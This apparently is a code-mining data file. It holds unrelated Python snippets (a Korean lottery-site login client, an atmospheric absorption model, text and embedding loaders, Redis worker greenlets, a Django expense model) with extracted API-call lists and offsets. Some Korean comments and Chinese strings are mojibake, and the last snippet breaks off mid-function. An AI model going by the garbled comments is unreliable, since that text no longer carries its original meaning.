"sec-ch-ua": '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
"sec-ch-ua-mobile": "?0",
"Upgrade-Insecure-Requests": "1",
"Origin": "https://dhlottery.co.kr",
"Content-Type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": "https://dhlottery.co.kr/",
"Sec-Fetch-Site": "same-site",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-User": "?1",
"Sec-Fetch-Dest": "document",
"Accept-Language": "ko,en-US;q=0.9,en;q=0.8,ko-KR;q=0.7",
}
_AUTH_CRED = ""
def login(self, user_id: str, password: str):
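        """Log in to dhlottery.co.kr and keep the resulting JSESSIONID in _AUTH_CRED."""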
assert type(user_id) == str
assert type(password) == str
        default_auth_cred = (
            self._get_default_auth_cred()
        )  # fetch a JSESSIONID first, then attach the authentication to that value
headers = self._generate_req_headers(default_auth_cred)
data = self._generate_body(user_id, password)
        _res = self._try_login(headers, data)  # a fresh JSESSIONID comes back, but that value cannot be used to log in
self._update_auth_cred(default_auth_cred)
    def add_auth_cred_to_headers(self, headers: dict) -> dict:
assert type(headers) == dict
copied_headers = copy.deepcopy(headers)
copied_headers["Cookie"] = f"JSESSIONID={self._AUTH_CRED}"
return copied_headers
def _get_default_auth_cred(self):
res = requests.get(
"https://dhlottery.co.kr/gameResult.do?method=byWin&wiselog=H_C_1_1"
)
return self._get_j_session_id_from_response(res)
def _get_j_session_id_from_response(self, res: requests.Response):
assert type(res) == requests.Response
for cookie in res.cookies:
if cookie.name == "JSESSIONID":
return cookie.value
raise KeyError("JSESSIONID cookie is not set in response")
def _generate_req_headers(self, j_session_id: str):
assert type(j_session_id) == str
copied_headers = copy.deepcopy(self._REQ_HEADERS)
copied_headers["Cookie"] = f"JSESSIONID={j_session_id}"
return copied_headers
def _generate_body(self, user_id: str, password: str):
assert type(user_id) == str
assert type(password) == str
return {
"returnUrl": "https://dhlottery.co.kr/common.do?method=main",
"userId": user_id,
"password": password,
"checkSave": "on",
"newsEventYn": "",
}
def _try_login(self, headers: dict, data: dict):
assert type(headers) == dict
assert type(data) == dict
res = requests.post(
"https://www.dhlottery.co.kr/userSsl.do?method=login",
headers=headers,
data=data,
)
return res
def _update_auth_cred(self, j_session_id: str) -> None:
assert type(j_session_id) == str
# TODO: judge whether login is success or not
# ๋ก๊ทธ์ธ ์คํจํด๋ jsession ๊ฐ์ด ๊ฐฑ์ ๋๊ธฐ ๋๋ฌธ์, ๋ง์ดํ์ด์ง ๋ฐฉ๋ฌธ ๋ฑ์ผ๋ก ํ๋จํด์ผ ํ ๋ฏ
# + ๋น๋ฒ 5๋ฒ ํ๋ ธ์ ๊ฒฝ์ฐ์ ๋น๋ฒ ์ ํํด๋ ๋ก๊ทธ์ธ ์คํจํจ
self._AUTH_CRED = j_session_id
|
[
"requests.post",
"copy.deepcopy",
"requests.get"
] |
[((1642, 1664), 'copy.deepcopy', 'copy.deepcopy', (['headers'], {}), '(headers)\n', (1655, 1664), False, 'import copy\n'), ((1815, 1902), 'requests.get', 'requests.get', (['"""https://dhlottery.co.kr/gameResult.do?method=byWin&wiselog=H_C_1_1"""'], {}), "(\n 'https://dhlottery.co.kr/gameResult.do?method=byWin&wiselog=H_C_1_1')\n", (1827, 1902), False, 'import requests\n'), ((2404, 2436), 'copy.deepcopy', 'copy.deepcopy', (['self._REQ_HEADERS'], {}), '(self._REQ_HEADERS)\n', (2417, 2436), False, 'import copy\n'), ((3033, 3133), 'requests.post', 'requests.post', (['"""https://www.dhlottery.co.kr/userSsl.do?method=login"""'], {'headers': 'headers', 'data': 'data'}), "('https://www.dhlottery.co.kr/userSsl.do?method=login',\n headers=headers, data=data)\n", (3046, 3133), False, 'import requests\n')]
|
import math
import os.path
from radiobear.constituents import parameters
# Some constants
T0 = 300.0 # reference temperature in K
AMU_H2O = 18.015
R = 8.314462E7
# Set data arrays
f0 = []
Ei = []
A = []
GH2 = []
GHe = []
GH2O = []
x_H2 = []
x_He = []
x_H2O = []
def readInputFiles(par):
"""If needed this reads in the data files for h2o"""
useLinesUpTo = 10 # index number
global nlin
nlin = 0
if par.verbose:
print("Reading h2o lines")
filename = os.path.join(par.path, 'h2od.lin')
ifp = open(filename, 'r')
for line in ifp:
if nlin >= useLinesUpTo:
break
nlin += 1
data = line.split()
if len(data) == 9:
f0.append(float(data[0]))
Ei.append(float(data[1]))
A.append(float(data[2]))
GH2.append(float(data[3]))
GHe.append(float(data[4]))
GH2O.append(float(data[5]))
x_H2.append(float(data[6]))
x_He.append(float(data[7]))
x_H2O.append(float(data[8]))
else:
break
ifp.close()
if par.verbose:
print(' ' + str(nlin) + ' lines')
return nlin
def alpha(freq, T, P, X, P_dict, other_dict, **kwargs):
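    """Compute the H2O absorption for each frequency in freq at temperature T, pressure P and mixing ratios X."""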
# Read in data if needed
par = parameters.setpar(kwargs)
if len(f0) == 0:
readInputFiles(par)
P_h2 = P*X[P_dict['H2']]
P_he = P*X[P_dict['HE']]
P_h2o = P*X[P_dict['H2O']]
n_int = 3.0/2.0
rho = 1.0E12*AMU_H2O*P_h2o/(R*T)
Pa = 0.81*P_h2 + 0.35*P_he
alpha_h2o = []
for f in freq:
f2 = f**2
alpha = 0.0
for i in range(nlin):
gamma = pow((T0/T), x_H2[i])*GH2[i]*P_h2
gamma += pow((T0/T), x_He[i])*GHe[i]*P_he
gamma += pow((T0/T), x_H2O[i])*GH2O[i]*P_h2o
g2 = gamma**2
ITG = A[i]*math.exp(-Ei[i]/T)
shape = gamma/((f0[i]**2 - f2)**2 + 4.0*f2*g2)
alpha += shape*ITG
GR1971 = 1.08E-11*rho*pow((T0/T), 2.1)*Pa*f2
a = 2.0*f2*rho*pow((T0/T), n_int)*alpha/434294.5 + GR1971/434294.5
if par.units == 'dBperkm':
a *= 434294.5
alpha_h2o.append(a)
return alpha_h2o
|
[
"math.exp",
"radiobear.constituents.parameters.setpar"
] |
[((1340, 1365), 'radiobear.constituents.parameters.setpar', 'parameters.setpar', (['kwargs'], {}), '(kwargs)\n', (1357, 1365), False, 'from radiobear.constituents import parameters\n'), ((1933, 1953), 'math.exp', 'math.exp', (['(-Ei[i] / T)'], {}), '(-Ei[i] / T)\n', (1941, 1953), False, 'import math\n')]
|
import re
import gzip
import numpy as np
from zipfile import ZipFile
def load_corpus(corpus_file, load_tags=False):
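    """Load a corpus from a gzipped text file (one whitespace-tokenized sentence per line) or a CoNLL-U file."""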
if corpus_file.endswith('.gz'):
corpus = []
with gzip.open(corpus_file, 'r') as f:
for line in f:
corpus.append(line.decode("utf-8").split())
    elif corpus_file.endswith('.conllu'):
        corpus = read_conllUD_file(corpus_file, load_tags)
    else:
        raise ValueError('Unsupported corpus file format: {}'.format(corpus_file))
    return corpus
def read_conllUD_file(location, load_tags):
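    """Parse a CoNLL-U file into sentences; tokens are (form, UPOS) pairs when load_tags is True, bare forms otherwise."""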
sentences = []
tokens = []
with open(location) as f:
for l in f:
if not(l.strip().startswith('#')):
s = l.split('\t')
if len(s) == 10 and not('-' in s[0]):
if load_tags:
tokens.append((s[1], s[3]))
else:
tokens.append(s[1])
elif len(l.strip())==0 and len(tokens) > 0:
sentences.append(tokens)
tokens = []
return enforce_unicode(sentences)
def enforce_unicode(sentences):
"""
In Python3 we should check for str class instead of unicode according to
https://stackoverflow.com/questions/19877306/nameerror-global-name-unicode-is-not-defined-in-python-3
"""
if len(sentences) == 0 or type(sentences[0][0][0]) == str: # if the first token is already unicode, there seems nothing to be done
return sentences
return [[(unicode(t[0], "utf8"), unicode(t[1], "utf8")) for t in s] for s in sentences]
def load_embeddings(filename, max_words=-1):
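    """Read embeddings from a .gz, .zip or plain text file; returns (matrix, word-to-index dict, index-to-word dict)."""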
if filename.endswith('.gz'):
lines = gzip.open(filename)
elif filename.endswith('.zip'):
myzip = ZipFile(filename) # we assume only one embedding file to be included in a zip file
lines = myzip.open(myzip.namelist()[0])
else:
lines = open(filename)
data, words = [], []
for counter, line in enumerate(lines):
if len(words) == max_words:
break
if type(line) == bytes:
try:
line = line.decode("utf-8")
except UnicodeDecodeError:
print('Error at line {}: {}'.format(counter, line))
continue
tokens = line.rstrip().split(' ')
if len(words) == 0 and len(tokens) == 2 and re.match('[1-9][0-9]*', tokens[0]):
# the first line might contain the number of embeddings and dimensionality of the vectors
continue
try:
values = [float(i) for i in tokens[1:]]
if sum([v**2 for v in values]) > 0: # only embeddings with non-zero norm are kept
data.append(values)
words.append(tokens[0])
        except ValueError:
print('Error while parsing input line #{}: {}'.format(counter, line))
i2w = dict(enumerate(words))
return np.array(data), {v:k for k,v in i2w.items()}, i2w
|
[
"numpy.array",
"zipfile.ZipFile",
"gzip.open",
"re.match"
] |
[((1602, 1621), 'gzip.open', 'gzip.open', (['filename'], {}), '(filename)\n', (1611, 1621), False, 'import gzip\n'), ((2824, 2838), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (2832, 2838), True, 'import numpy as np\n'), ((187, 214), 'gzip.open', 'gzip.open', (['corpus_file', '"""r"""'], {}), "(corpus_file, 'r')\n", (196, 214), False, 'import gzip\n'), ((1674, 1691), 'zipfile.ZipFile', 'ZipFile', (['filename'], {}), '(filename)\n', (1681, 1691), False, 'from zipfile import ZipFile\n'), ((2287, 2321), 're.match', 're.match', (['"""[1-9][0-9]*"""', 'tokens[0]'], {}), "('[1-9][0-9]*', tokens[0])\n", (2295, 2321), False, 'import re\n')]
|
from flask import (Flask, render_template, jsonify, request, redirect)
import os
import logging
# Get the logger
logger = logging.getLogger()
logger.setLevel(logging.INFO)
#################################################
# Flask Setup
#################################################
application = Flask(__name__)
#################################################
# Routes
#################################################
# create route that renders index.html template
@application.route("/")
def home():
return render_template("index.html")
#################################################
# Run the application
#################################################
# run the app.
if __name__ == "__main__":
# Setting debug to True enables debug output. This line should be
# removed before deploying a production app.
application.debug = True
application.run()
|
[
"flask.render_template",
"flask.Flask",
"logging.getLogger"
] |
[((123, 142), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (140, 142), False, 'import logging\n'), ((304, 319), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (309, 319), False, 'from flask import Flask, render_template, jsonify, request, redirect\n'), ((526, 555), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (541, 555), False, 'from flask import Flask, render_template, jsonify, request, redirect\n')]
|
# simple text object
from typing import List, Dict
import os
import re
from agsearch.textinfo import TextInfo
from agsearch.terminfo import TermInfo
from agsearch.utils import DATA_DIR
from agsearch.utils import PUNCTUATIONS
from greek_accentuation.characters import base
from cltk.stop.greek.stops import STOPS_LIST
from cltk.corpus.greek.alphabet import filter_non_greek
class Text:
def __init__(
self, chunks: List[str], has_chunks: bool, is_clean: bool, text_id: str
):
self.chunks = chunks
self.has_chunks = has_chunks
self.is_clean = is_clean
self.text_id = text_id
self.term_freq: Dict[str, int] = {}
@classmethod
def read_text(cls, path: str) -> str:
txt = None
with open(path, "r", encoding="utf-8") as f:
txt = f.read()
return txt
@classmethod
def to_lower(cls, txt: str) -> str:
return txt.lower()
@classmethod
def remove_stop_words(cls, txt: str) -> str:
"remove stop words starting from longer"
text = txt
slist = STOPS_LIST.copy()
slist.sort(key=lambda x: len(x), reverse=True)
for word in slist:
text = text.replace(word, " ")
return text
@classmethod
    def remove_punk(cls, txt: str) -> str:
        "Remove punctuation characters from the text."
text = txt
for punk in PUNCTUATIONS:
text = text.replace(punk, " ")
return text
@classmethod
def remove_accent(cls, txt: str) -> str:
"remove accents from chars"
txts: List[str] = []
for t in txt:
tclean = base(t)
txts.append(tclean)
return "".join(txts)
@classmethod
    def remove_non_greek(cls, txt: str) -> str:
        "Drop characters that are not part of the Greek alphabet."
return filter_non_greek(txt)
@classmethod
    def remove_multiple_space(cls, txt):
        "Collapse runs of whitespace into a single space."
return re.sub(r"\s+", " ", txt)
@classmethod
def clean_chunk(cls, txt: str):
txt = cls.remove_non_greek(txt)
return cls.remove_multiple_space(txt)
@classmethod
def clean_text(cls, text: str) -> str:
txt = cls.to_lower(text)
txt = cls.remove_stop_words(txt)
txt = cls.remove_punk(txt)
txt = cls.remove_accent(txt)
return txt
@classmethod
    def get_terms(cls, chunks: List[str], sep: str) -> Dict[str, int]:
        "Count how many times each term occurs across the chunks."
terms: Dict[str, int] = {}
for chunk in chunks:
chunk_terms = [t.strip() for t in chunk.split(sep) if t]
for t in chunk_terms:
if t in terms:
terms[t] += 1
else:
terms[t] = 1
return terms
@classmethod
def from_info(cls, info: TextInfo, chunk_sep: str = " "):
"create text from text info"
text_id = info.text_id
text_path = os.path.join(DATA_DIR, info.local_path)
text = cls.read_text(text_path)
text = cls.clean_text(text)
terms: Dict[str, int] = {}
chunks: List[str] = []
if info.has_chunks:
chunks = text.split(info.chunk_separator)
chunks = [cls.clean_chunk(c) for c in chunks if c]
terms = cls.get_terms(chunks, chunk_sep)
else:
chunks = [text]
chunks = [cls.clean_chunk(c) for c in chunks if c]
terms = cls.get_terms(chunks, chunk_sep)
#
text_obj = Text(
chunks=chunks, has_chunks=info.has_chunks, is_clean=True, text_id=text_id
)
text_obj.term_freq = terms
return text_obj
    def to_doc_counts(self) -> Dict[str, Dict[str, int]]:
        "Map each term to its occurrence count keyed by this text's id."
term_doc_id_counts: Dict[str, Dict[str, int]] = {}
for term, count in self.term_freq.items():
doc_id_count = {self.text_id: count}
term_doc_id_counts[term] = doc_id_count
return term_doc_id_counts
|
[
"os.path.join",
"cltk.stop.greek.stops.STOPS_LIST.copy",
"greek_accentuation.characters.base",
"re.sub",
"cltk.corpus.greek.alphabet.filter_non_greek"
] |
[((1093, 1110), 'cltk.stop.greek.stops.STOPS_LIST.copy', 'STOPS_LIST.copy', ([], {}), '()\n', (1108, 1110), False, 'from cltk.stop.greek.stops import STOPS_LIST\n'), ((1776, 1797), 'cltk.corpus.greek.alphabet.filter_non_greek', 'filter_non_greek', (['txt'], {}), '(txt)\n', (1792, 1797), False, 'from cltk.corpus.greek.alphabet import filter_non_greek\n'), ((1888, 1912), 're.sub', 're.sub', (['"""\\\\s+"""', '""" """', 'txt'], {}), "('\\\\s+', ' ', txt)\n", (1894, 1912), False, 'import re\n'), ((2855, 2894), 'os.path.join', 'os.path.join', (['DATA_DIR', 'info.local_path'], {}), '(DATA_DIR, info.local_path)\n', (2867, 2894), False, 'import os\n'), ((1615, 1622), 'greek_accentuation.characters.base', 'base', (['t'], {}), '(t)\n', (1619, 1622), False, 'from greek_accentuation.characters import base\n')]
|
import gevent
import gevent.queue
from establishment.misc.command_processor import BaseProcessor
from establishment.misc.threading_helper import ThreadHandler
from establishment.funnel.redis_stream import RedisStreamPublisher, RedisStreamSubscriber, RedisQueue, \
redis_response_to_json
class GreenletWorker(gevent.Greenlet):
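    """A greenlet that loops calling tick() until stopped, re-initializing itself after any error."""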
def __init__(self, logger=None, context=None):
gevent.Greenlet.__init__(self)
self.running = False
self.logger = logger
self.context = context
def _run(self):
self.running = True
self.init()
while self.running:
try:
self.tick()
gevent.sleep(0)
except Exception:
self.log_exception("Error in worker " + str(self.__class__.__name__))
self.cleanup()
self.init()
def init(self):
pass
def cleanup(self):
pass
def tick(self):
pass
def stop(self):
self.running = False
def log_exception(self, message):
if self.logger:
self.logger.exception(message)
def log_error(self, message):
if self.logger:
self.logger.error(message)
class GreenletQueueWorker(GreenletWorker):
def __init__(self, job_queue=None, result_queue=None, logger=None, context=None):
super().__init__(logger=logger, context=context)
self.job_queue = job_queue
self.result_queue = result_queue
def tick(self):
try:
command = self.job_queue.get(timeout=1)
except gevent.queue.Empty:
return
result = self.process_command(command)
if result:
self.result_queue.put(result)
def process_command(self, command):
return None
class GreenletRedisQueueListener(GreenletQueueWorker):
def __init__(self, job_queue, redis_queue_name, redis_connection=None, logger=None, context=None,
job_queue_max_size=1024, bulk_size=128):
super().__init__(job_queue=job_queue, logger=logger, context=context)
self.redis_queue_name = redis_queue_name
self.redis_queue = None
self.redis_connection = redis_connection
self.job_queue_max_size = job_queue_max_size
self.bulk_size = bulk_size
self.activate_bulk_retrieval = False
def init(self):
if not self.redis_queue:
self.redis_queue = RedisQueue(self.redis_queue_name, connection=self.redis_connection)
def cleanup(self):
self.redis_queue = None
def tick(self):
if self.job_queue.qsize() >= self.job_queue_max_size:
gevent.sleep(0.5)
return
if self.activate_bulk_retrieval:
jobs = self.redis_queue.bulk_pop(self.bulk_size)
if len(jobs) == 0:
self.activate_bulk_retrieval = False
else:
job = self.redis_queue.pop(timeout=1)
if job:
self.activate_bulk_retrieval = True
jobs = [job]
for job in jobs:
job = redis_response_to_json(job)
if job:
self.job_queue.put(job)
class GreenletRedisStreamListener(GreenletQueueWorker):
def __init__(self, job_queue, redis_stream_name, logger=None, context=None):
super().__init__(job_queue=job_queue, logger=logger, context=context)
self.redis_stream_name = redis_stream_name
self.redis_stream_subscriber = None
def init(self):
if not self.redis_stream_subscriber:
self.redis_stream_subscriber = RedisStreamSubscriber()
self.redis_stream_subscriber.subscribe(self.redis_stream_name)
def cleanup(self):
self.redis_stream_subscriber = None
def tick(self):
message, stream_name = self.redis_stream_subscriber.next_message()
message = redis_response_to_json(message)
if message:
self.job_queue.put(message)
class GreenletRedisStreamPublisher(GreenletQueueWorker):
def __init__(self, result_queue, redis_stream_name, logger=None, context=None):
super().__init__(result_queue=result_queue, logger=logger, context=context)
self.redis_stream_name = redis_stream_name
self.redis_stream_publisher = None
def init(self):
if not self.redis_stream_publisher:
self.redis_stream_publisher = RedisStreamPublisher(self.redis_stream_name, raw=True)
def cleanup(self):
self.redis_stream_publisher = None
def tick(self):
try:
result = self.result_queue.get(timeout=1)
except gevent.queue.Empty:
return
if not result:
return
self.redis_stream_publisher.publish_json(result)
class GreenletRedisQueueCommandProcessor(BaseProcessor):
def __init__(self, logger_name, WorkerClass, redis_queue_name_in, redis_stream_name_out=None, num_workers=10,
job_queue_max_size=1024):
super().__init__(logger_name=logger_name)
self.workers = []
self.job_queue = None
self.result_queue = None
self.num_workers = num_workers
self.job_queue_max_size = job_queue_max_size
self.redis_queue_name_in = redis_queue_name_in
self.redis_stream_name_out = redis_stream_name_out
self.WorkerClass = WorkerClass
self.worker_context = None
def main(self):
self.workers = []
self.job_queue = gevent.queue.Queue()
self.result_queue = gevent.queue.Queue()
self.workers.append(GreenletRedisQueueListener(job_queue=self.job_queue, logger=self.logger,
redis_queue_name=self.redis_queue_name_in,
job_queue_max_size=self.job_queue_max_size))
if self.redis_stream_name_out:
self.workers.append(GreenletRedisStreamPublisher(result_queue=self.result_queue, logger=self.logger,
redis_stream_name=self.redis_stream_name_out))
for i in range(self.num_workers):
self.workers.append(self.WorkerClass(job_queue=self.job_queue, result_queue=self.result_queue,
logger=self.logger, context=self.worker_context))
for worker in self.workers:
worker.start()
gevent.joinall(self.workers)
self.workers = []
self.job_queue = None
self.result_queue = None
self.logger.info("Gracefully stopped to process commands " + str(self.__class__.__name__))
def start(self):
self.background_thread = ThreadHandler("Command processor " + str(self.__class__.__name__), self.process,
daemon=False)
def stop(self):
super().stop()
for worker in self.workers:
worker.stop()
|
[
"establishment.funnel.redis_stream.RedisQueue",
"establishment.funnel.redis_stream.RedisStreamSubscriber",
"establishment.funnel.redis_stream.RedisStreamPublisher",
"establishment.funnel.redis_stream.redis_response_to_json",
"gevent.Greenlet.__init__",
"gevent.sleep",
"gevent.queue.Queue",
"gevent.joinall"
] |
[((392, 422), 'gevent.Greenlet.__init__', 'gevent.Greenlet.__init__', (['self'], {}), '(self)\n', (416, 422), False, 'import gevent\n'), ((3877, 3908), 'establishment.funnel.redis_stream.redis_response_to_json', 'redis_response_to_json', (['message'], {}), '(message)\n', (3899, 3908), False, 'from establishment.funnel.redis_stream import RedisStreamPublisher, RedisStreamSubscriber, RedisQueue, redis_response_to_json\n'), ((5468, 5488), 'gevent.queue.Queue', 'gevent.queue.Queue', ([], {}), '()\n', (5486, 5488), False, 'import gevent\n'), ((5517, 5537), 'gevent.queue.Queue', 'gevent.queue.Queue', ([], {}), '()\n', (5535, 5537), False, 'import gevent\n'), ((6420, 6448), 'gevent.joinall', 'gevent.joinall', (['self.workers'], {}), '(self.workers)\n', (6434, 6448), False, 'import gevent\n'), ((2439, 2506), 'establishment.funnel.redis_stream.RedisQueue', 'RedisQueue', (['self.redis_queue_name'], {'connection': 'self.redis_connection'}), '(self.redis_queue_name, connection=self.redis_connection)\n', (2449, 2506), False, 'from establishment.funnel.redis_stream import RedisStreamPublisher, RedisStreamSubscriber, RedisQueue, redis_response_to_json\n'), ((2658, 2675), 'gevent.sleep', 'gevent.sleep', (['(0.5)'], {}), '(0.5)\n', (2670, 2675), False, 'import gevent\n'), ((3086, 3113), 'establishment.funnel.redis_stream.redis_response_to_json', 'redis_response_to_json', (['job'], {}), '(job)\n', (3108, 3113), False, 'from establishment.funnel.redis_stream import RedisStreamPublisher, RedisStreamSubscriber, RedisQueue, redis_response_to_json\n'), ((3595, 3618), 'establishment.funnel.redis_stream.RedisStreamSubscriber', 'RedisStreamSubscriber', ([], {}), '()\n', (3616, 3618), False, 'from establishment.funnel.redis_stream import RedisStreamPublisher, RedisStreamSubscriber, RedisQueue, redis_response_to_json\n'), ((4397, 4451), 'establishment.funnel.redis_stream.RedisStreamPublisher', 'RedisStreamPublisher', (['self.redis_stream_name'], {'raw': '(True)'}), '(self.redis_stream_name, raw=True)\n', (4417, 4451), False, 'from establishment.funnel.redis_stream import RedisStreamPublisher, RedisStreamSubscriber, RedisQueue, redis_response_to_json\n'), ((672, 687), 'gevent.sleep', 'gevent.sleep', (['(0)'], {}), '(0)\n', (684, 687), False, 'import gevent\n')]
|
#!/usr/bin/python
from setuptools import setup, find_packages
install_requires = [
'cmdln',
'SQLAlchemy == 0.5.5'
]
extras_require = {
'ldap' : 'python-ldap',
'postgres' : 'psycopg2'
}
setup(name='Mothership',
      author='Gilt SA team',
      author_email='<EMAIL>',
      description='Mothership - asset management',
      packages=find_packages(),
      scripts=['ship',
               'ship_readonly'
               ],
      url='http://mothership.sf.net',
      version='0.0.28',
      install_requires=install_requires,
      extras_require=extras_require,
      )
|
[
"setuptools.find_packages"
] |
[((381, 396), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (394, 396), False, 'from setuptools import setup, find_packages\n')]
|
# coding=utf-8
from django.contrib.auth.models import User
from django.db import models
from modules.dict_table.models import ExpenseType
from modules.employee_management.employee_info.models import Employee
from modules.project_manage.models import Project
APPLY_STATUS_CHOICES = (
    ('1', u'待审批'),
    ('2', u'通过'),
    ('3', u'拒绝'),
)
INOROUT_CHOICES = (
    ('1', u'支出'),
    ('2', u'收入'),
)
class Expense(models.Model):
    """Expense information."""
emplyid = models.ForeignKey(Employee, verbose_name=u"ๅๅทฅ็ผๅท", related_name="expense_emp", blank=True, null=True)
projectid = models.ForeignKey(Project, verbose_name=u"้กน็ฎๅ็งฐ", related_name="expense_project", blank=True,
null=True)
userid = models.ForeignKey(User, verbose_name=u"่ดน็จ่ด่ดฃไบบ", related_name="expense_user", blank=True, null=True)
expensetype = models.ForeignKey(ExpenseType, verbose_name=u"่ดน็จ็ฑปๅ", blank=True, null=True)
inorout = models.CharField(u"ๆถๆฏ็ฑปๅ", max_length=100, choices=INOROUT_CHOICES, default='1')
note = models.CharField(u"็ณ่ฏท่ฏดๆ", max_length=100)
apply_user = models.ForeignKey(User, verbose_name=u"็ณ่ฏทไบบ")
created = models.DateTimeField(u"็ณ่ฏทๆถ้ด", auto_now_add=True)
handle_user = models.CharField(u"ๅฎกๆนไบบ", max_length=100, blank=True)
handle_date = models.DateTimeField(u"ๅฎกๆนๆถ้ด", blank=True, null=True)
reason = models.CharField(u"ๅฎกๆนๅๅค", max_length=100, blank=True)
status = models.CharField(u"ๅฎกๆน็ถๆ", max_length=100, choices=APPLY_STATUS_CHOICES, default='1')
remark1 = models.CharField(u"ๅคๆณจ1", max_length=256, blank=True)
remark2 = models.CharField(u"ๅคๆณจ2", max_length=256, blank=True)
remark3 = models.CharField(u"ๅคๆณจ3", max_length=256, blank=True)
remark4 = models.CharField(u"ๅคๆณจ4", max_length=256, blank=True)
remark5 = models.CharField(u"ๅคๆณจ5", max_length=256, blank=True)
def __str__(self):
        return str(self.emplyid)
class Meta:
verbose_name = u"่ดน็จไฟกๆฏ"
        ordering = ['-id']  # order by id descending
        index_together = ["emplyid", "projectid"]  # composite index on these fields
permissions = (
("browse_expense", u"ๆต่ง ่ดน็จไฟกๆฏ"),
)
def get_absolute_url(self):
return "/expense/list"
|
[
"django.db.models.ForeignKey",
"django.db.models.DateTimeField",
"django.db.models.CharField"
] |
[((437, 542), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Employee'], {'verbose_name': 'u"""员工编号"""', 'related_name': '"""expense_emp"""', 'blank': '(True)', 'null': '(True)'}), "(Employee, verbose_name=u'员工编号', related_name=\n 'expense_emp', blank=True, null=True)\n", (454, 542), False, 'from django.db import models\n'), ((551, 659), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Project'], {'verbose_name': 'u"""项目名称"""', 'related_name': '"""expense_project"""', 'blank': '(True)', 'null': '(True)'}), "(Project, verbose_name=u'项目名称', related_name=\n 'expense_project', blank=True, null=True)\n", (568, 659), False, 'from django.db import models\n'), ((696, 798), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'verbose_name': 'u"""费用负责人"""', 'related_name': '"""expense_user"""', 'blank': '(True)', 'null': '(True)'}), "(User, verbose_name=u'费用负责人', related_name='expense_user',\n blank=True, null=True)\n", (713, 798), False, 'from django.db import models\n'), ((810, 885), 'django.db.models.ForeignKey', 'models.ForeignKey', (['ExpenseType'], {'verbose_name': 'u"""费用类型"""', 'blank': '(True)', 'null': '(True)'}), "(ExpenseType, verbose_name=u'费用类型', blank=True, null=True)\n", (827, 885), False, 'from django.db import models\n'), ((897, 976), 'django.db.models.CharField', 'models.CharField', (['u"""消息类型"""'], {'max_length': '(100)', 'choices': 'INOROUT_CHOICES', 'default': '"""1"""'}), "(u'消息类型', max_length=100, choices=INOROUT_CHOICES, default='1')\n", (913, 976), False, 'from django.db import models\n'), ((985, 1026), 'django.db.models.CharField', 'models.CharField', (['u"""申请说明"""'], {'max_length': '(100)'}), "(u'申请说明', max_length=100)\n", (1001, 1026), False, 'from django.db import models\n'), ((1041, 1085), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'verbose_name': 'u"""申请人"""'}), "(User, verbose_name=u'申请人')\n", (1058, 1085), False, 'from django.db import models\n'), ((1097, 1145), 'django.db.models.DateTimeField', 'models.DateTimeField', (['u"""申请时间"""'], {'auto_now_add': '(True)'}), "(u'申请时间', auto_now_add=True)\n", (1117, 1145), False, 'from django.db import models\n'), ((1161, 1213), 'django.db.models.CharField', 'models.CharField', (['u"""审批人"""'], {'max_length': '(100)', 'blank': '(True)'}), "(u'审批人', max_length=100, blank=True)\n", (1177, 1213), False, 'from django.db import models\n'), ((1229, 1281), 'django.db.models.DateTimeField', 'models.DateTimeField', (['u"""审批时间"""'], {'blank': '(True)', 'null': '(True)'}), "(u'审批时间', blank=True, null=True)\n", (1249, 1281), False, 'from django.db import models\n'), ((1292, 1345), 'django.db.models.CharField', 'models.CharField', (['u"""审批回复"""'], {'max_length': '(100)', 'blank': '(True)'}), "(u'审批回复', max_length=100, blank=True)\n", (1308, 1345), False, 'from django.db import models\n'), ((1356, 1444), 'django.db.models.CharField', 'models.CharField', (['u"""审批状态"""'], {'max_length': '(100)', 'choices': 'APPLY_STATUS_CHOICES', 'default': '"""1"""'}), "(u'审批状态', max_length=100, choices=APPLY_STATUS_CHOICES,\n default='1')\n", (1372, 1444), False, 'from django.db import models\n'), ((1452, 1504), 'django.db.models.CharField', 'models.CharField', (['u"""备注1"""'], {'max_length': '(256)', 'blank': '(True)'}), "(u'备注1', max_length=256, blank=True)\n", (1468, 1504), False, 'from django.db import models\n'), ((1516, 1568), 'django.db.models.CharField', 'models.CharField', (['u"""备注2"""'], {'max_length': '(256)', 'blank': '(True)'}), "(u'备注2', max_length=256, blank=True)\n", (1532, 1568), False, 'from django.db import models\n'), ((1580, 1632), 'django.db.models.CharField', 'models.CharField', (['u"""备注3"""'], {'max_length': '(256)', 'blank': '(True)'}), "(u'备注3', max_length=256, blank=True)\n", (1596, 1632), False, 'from django.db import models\n'), ((1644, 1696), 'django.db.models.CharField', 'models.CharField', (['u"""备注4"""'], {'max_length': '(256)', 'blank': '(True)'}), "(u'备注4', max_length=256, blank=True)\n", (1660, 1696), False, 'from django.db import models\n'), ((1708, 1760), 'django.db.models.CharField', 'models.CharField', (['u"""备注5"""'], {'max_length': '(256)', 'blank': '(True)'}), "(u'备注5', max_length=256, blank=True)\n", (1724, 1760), False, 'from django.db import models\n')]
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from losses.bilinear_sampler import apply_disparity
from .ssim import ssim_gauss, ssim_godard
class BaseGeneratorLoss(nn.modules.Module):
def __init__(self, args):
super(BaseGeneratorLoss, self).__init__()
self.which_ssim = args.which_ssim
self.ssim_window_size = args.ssim_window_size
def scale_pyramid(self, img, num_scales):
scaled_imgs = [img]
s = img.size()
h = s[2]
w = s[3]
for i in range(num_scales - 1):
ratio = 2 ** (i + 1)
nh = h // ratio
nw = w // ratio
scaled_imgs.append(nn.functional.interpolate(img, [nh, nw], mode='bilinear', align_corners=False))
return scaled_imgs
def gradient_x(self, img):
# Pad input to keep output size consistent
img = F.pad(img, (0, 1, 0, 0), mode="replicate")
gx = img[:, :, :, :-1] - img[:, :, :, 1:] # NCHW
return gx
def gradient_y(self, img):
# Pad input to keep output size consistent
img = F.pad(img, (0, 0, 0, 1), mode="replicate")
